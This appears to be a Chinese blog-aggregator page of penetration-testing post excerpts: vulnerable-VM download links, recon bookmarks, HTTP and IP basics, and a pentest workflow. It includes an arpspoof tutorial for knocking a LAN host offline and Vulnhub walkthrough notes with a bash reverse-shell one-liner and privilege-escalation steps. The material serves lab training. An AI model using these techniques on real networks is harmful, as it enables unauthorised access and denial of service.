渗透测试

渗透测试靶机下载

风格不统一 提交于 2019-12-10 00:56:30
Vulnhub https://www.vulnhub.com prime靶机 https://www.vulnhub.com/entry/prime-1,358/ PentesterLab PentesterLab提供易受攻击的系统,可用于测试和了解漏洞。 我主要用的是两个web渗透测试演练系统:Web Pentester和Web PentesterII。 Web Pentester 下载: https://pentesterlab.com/exercises/web_for_pentester/iso Web Pentester II 下载: https://pentesterlab.com/exercises/web_for_pentester_II/iso 注意:PentesterLab提供的渗透测试演练系统有很多,不仅仅只有以下两种,以上两种只是web渗透测试而已 Metasploitable Metasploitable虚拟机是Ubuntu Linux的故意易受攻击版本,旨在测试安全工具并演示常见漏洞。此 可虚拟机可用于执行安全培训,测试安全工具以及实践常见的渗透测试技术。 Metasploitable还包括非常著名的的 DVWA 、 mutillidae 。 DVWA (Dam Vulnerable Web Application)是用PHP

一些不错的网页

会有一股神秘感。 提交于 2019-12-06 21:09:18
书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL IP高精度定位|IP查询|查IP|IP定位|IP地址区县库免费下载 💀 Sploitus | Exploit & Hacktool Search Engine BugScan--漏洞插件社区 Multiple Origin Routes Report - bgp.he.net Netcraft | Internet Research, Anti-Phishing and PCI Security Services 通过netcraft查询一个网站的服务信息 - CSDN博客 BugScan--漏洞插件社区 70015工具库 使用nmap 验证多种漏洞 - CSDN博客 ZoomEye网络空间搜索引擎 1.1.1.1上的网站 1.1.1.1同ip域名查询 1.1.1.1域名反查 HTML转义字符表 | HTML转义对照 —在线工具 DNSdumpster.com - dns recon and research, find and lookup dns records WhatWeb - Next generation web scanner. 在线子域名查询-接口光速版 Shodan

一些不错的网页

寵の児 提交于 2019-12-06 21:06:39
书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL IP高精度定位|IP查询|查IP|IP定位|IP地址区县库免费下载 💀 Sploitus | Exploit & Hacktool Search Engine BugScan--漏洞插件社区 Multiple Origin Routes Report - bgp.he.net Netcraft | Internet Research, Anti-Phishing and PCI Security Services 通过netcraft查询一个网站的服务信息 - CSDN博客 BugScan--漏洞插件社区 70015工具库 使用nmap 验证多种漏洞 - CSDN博客 ZoomEye网络空间搜索引擎 1.1.1.1上的网站 1.1.1.1同ip域名查询 1.1.1.1域名反查 HTML转义字符表 | HTML转义对照 —在线工具 DNSdumpster.com - dns recon and research, find and lookup dns records WhatWeb - Next generation web scanner. 在线子域名查询-接口光速版 Shodan

渗透测试之局域网断网攻击

倖福魔咒の 提交于 2019-12-06 19:54:16
关于局域网断网攻击,顾名思义,就是对局域网内某个IP或全部IP进行攻击,让局域网内某个IP或全部IP断网,这是不是很有趣。 原理:关于arp断网攻击是基于arp协议的缺陷,这其实是arp欺骗的时候配置错误引起的现象。就是以我的网卡代替网关。因为目标要上网的数据包需要经过网关,但现在我欺骗了目标主机,让它误认为我的网卡是网关,当数据包经过我的网卡的时候全部丢弃,这就造成了断网。 现在开始实现局域网断网攻击:我在虚拟机kali系统中攻击我的主机,使我的主机不能上网,使用的是Arpspoof工具(Arpspoof是一个非常好的ARP欺骗的源代码程序。它的运行不会影响整个网络的通信,该工具通过替换传输中的数据从而达到对目标的欺骗。) 第一步:首先,先确认自己的主机开始是能上网的 第二步:查看主机的ip和网关 第三步:查看局域网内的主机IP,选择你要攻击的IP,使用fping工具 fping命令格式: fping -asg 网段/掩码 -a:显示可ping同的目标 -s:打印统计数据 -p:显示ping包间隔 在kali终端输入:fping -asg 10.1.1.0/24 第四步:查看网卡名,ip地址是10.1.1.71 第五步:现在知道了网卡名,目标ip,网关ip,就可以使用arpspoof 进行攻击了( arpspoof 命令格式: arpspoof -i 网卡名 -t 目标ip

Vulnhub渗透测试练习(一) ----------Breach1.0

倾然丶 夕夏残阳落幕 提交于 2019-12-06 07:38:44
教程网址 https://www.freebuf.com/articles/system/171318.html 学习经验总结 1.使用jre的bin目录下的keytool命令来输入秘钥库口令进而获取证书文件 2.将证书文件导入wireshark中,注意ip和端口 3.数据包http basic认证 4.使用cat /etc/passwd查看用户 /etc/passwd文件格式 5.漏洞查询库www.exploit-db.com(建议使用外网) 6.免费的md5解密网站 https://www.somd5.com/ 7.若马经常被删除,可以建立反弹连接 echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash 8.提权 python -c 'import pty;pty.spawn("/bin/bash")' (目的是可以使用su命令) 9.查看系统内核版本 uname -a和cat /etc/issue 存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) 10.kali的strings命令 11.cat .bash_history查看历史命令 12.使用exiftool工具查看bill.png图片的exif信息 13

渗透测试-http协议简介

岁酱吖の 提交于 2019-12-06 06:35:18
HTTP协议 超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WWW文件都 必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。1960年美国人Ted Nelson构思了 一种通过计算机处理文本信息的方法,并称之为超文本(hypertext),这成为了HTTP超文本传输协议标准架构的发展根基。 Ted Nelson组织协调万维网协会(World Wide Web Consortium)和互联网工程工作小组(Internet Engineering Task Force )共同合作研究,最终发布了一系列的RFC,其中著名的RFC 2616定义了HTTP 1.1。 HTTP 的 URL 以 http:// 开头,而 HTTPS 的 URL 以 https:// 开头 HTTP 是不安全的,而 HTTPS 是安全的 HTTP 标准端口是 80 ,而 HTTPS 的标准端口是 443 在 OSI 网络模型中,HTTP 工作于应用层,而 HTTPS 工作在传输层 HTTP 无需加密,而 HTTPS 对传输的数据进行加密 HTTP 无需证书,而 HTTPS 需要认证证书 抓取一个HTTP请求 使用firefox浏览器抓取 使用burpsuite抓取 HTTP请求包

渗透测试-IP相关知识整理

删除回忆录丶 提交于 2019-12-06 06:35:10
IP地址:   英文名称为Internet Protocol Address,是指互联网协议地址又称为网际协议地址。IP地址是Ip协议提供的一种统一的地址格式,它为互联网上的每一个网络和每一台机器分配一个逻辑地址,以此来屏蔽物理地址的差异。 IP地址的分类:   IP地址根据网络号和主机号来分,分为A、B、C三类和特殊地址D和E。全0和全1都保留不用;   A类:(1.0.0.0-126.0.0.0)(默认子网掩码:255.0.0.0或 0xFF000000)第一个字节为网络号,后三个字节为主机号。该类IP地址的最前面为“0”,所以地址的网络号取值于1~126之间。一般用于大型网络。   B类:(128.0.0.0-191.255.0.0)(默认子网掩码:255.255.0.0或0xFFFF0000)前两个字节为网络号,后两个字节为主机号。该类IP地址的最前面为“10”,所以地址的网络号取值于128~191之间。一般用于中等规模网络。   C类:(192.0.0.0-223.255.255.0)(子网掩码:255.255.255.0或 0xFFFFFF00)前三个字节为网络号,最后一个字节为主机号。该类IP地址的最前面为“110”,所以地址的网络号取值于192~223之间。一般用于小型 网络。   D类:是多播地址。该类IP地址的最前面为“1110”,所以地址的网络号取值于224

渗透测试-常见网络设备简介

≯℡__Kan透↙ 提交于 2019-12-06 06:35:00
服务器   也称伺服器,是提供计算服务的设备。由于服务器需要响应服务请求,并进行处理,因此一般来说服 务器应具备承担服务并且保障服务的能力。 VPS   Virtual Private Server 虚拟专用服务器技术,将一台服务器分割成多个虚拟专享服务器的优质服务。我们一般 人通常说的VPS就是一台人家虚拟出来的服务器,这台服务器有外网IP,我们可以装好系统并直接连接。 ECS   ECS是阿里的云服务器的名字,不同云服务器的供应商名字叫法不一样,例如百度的云服务器好像叫BCC。云 服务器简单粗暴的可以理解为就是一台电脑,比你说的主机空间好一点。空间相当于电脑的一部分,通常只能 用来上传网站。电脑你就可以自己装程序了。想怎么折腾都可以,关键的是这台电脑永不关机还不耗自己家的 电。 防火墙   防火墙技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备,帮助计算机网络于其内、外网之间构 建一道相对隔绝的保护屏障,以保护用户资料与信息安全性的一种技术。 路由器   连接两个或多个网络的硬件设备,在网络间起网关的作用,读取每一个数据包中的地址然后决定如何传送的专 用智能性的网络设备。通常是一个计算机,它能够理解不同的协议,例如某个局域网使用的以太协议,因特网 使用的T CP/IP协议。这样,路由器可以分析各种不同类型网络传来的数据包的目的地址,把非T CP/IP网络的地 址转换成T

Web渗透测试流程

半世苍凉 提交于 2019-12-06 02:27:17
什么是渗透测试? 渗透测试 (penetration test) 并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客 的攻击方法,来评估计算机网络系统 安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。我们认为渗透测试还具有的两个显著特点是:渗透测试是一个渐进的并且逐步深入的过程。渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。作为网络安全防范的一种新技术,对于网络安全组织具有实际应用价值。但要找到一家合适的公司实施渗透测试并不容易。 渗透测试? Web 如何进行 应用数以千计,就有必要建立一套完整的安全测试框架,流程的最高 目的web 当需要测试的标是要保证交付给客户的安全测试服务质量。 立项:项目建立,时间安排,人力分配,目标制定,厂商接口 数 确定; 应用 : 分析系统架构、使用的组件、对外提供的接 web 威胁分析:针对具体的 & 系统分析 top3

渗透测试的基本流程 11/25

故事扮演 提交于 2019-12-05 14:52:52
0X00 前言 按照老师的要求,我也开始了每天坚持写博的第2天。记录一下自己的学习情况和轨迹,毕竟自己手打出来的才是属于自己的。 0X01 什么是渗透测试?以及渗透测试的相关标准(PTES) 渗透测试是通过模拟黑客的攻击方法来评估计算机网络系统的安全问题。 选择的渗透测试类型取决于公司和组织的用途和范围。 入门的渗透测试,首先需要了解渗透测试的流程、步骤与方法。尽管渗透目标的环境各不相同,但依然可以用一些标准化的方法体系进行规范和限制。 黑盒:没有提供关于他将要测试的应用程序的许多信息,有责任收集有关目标网络,系统或应用程序的信息。 白盒:将获得有关网络,系统或应用程序的完整信息以及源代码,操作系统详细信息和其他所需信息。它可以被认为是模拟内部来源的攻击。 灰盒:将具有应用程序或系统的部分知识。因此,它可以被认为是外部黑客的攻击,黑客已经非法访问组织的网络基础设施文档。 0x02 0.前期交互:确定项目范围,周期,采用的技术手段和工具,以及其他约束条件 (比如不可使用一些钓鱼,DDOS等影响系统的方法) 1.信息收集:收集目标相关的资产信息,包括域名,IP,邮箱,防御措施等 2.威胁建模:利用已经收集的信息对目标资产进行分析,获得可能存在的威胁,并规划攻击路径 漏洞分析:发现目标系统和应用中存在的漏洞(判断是否存在) 漏洞利用:对已发现的漏洞使用攻击向量进行攻击(比如常见的9种)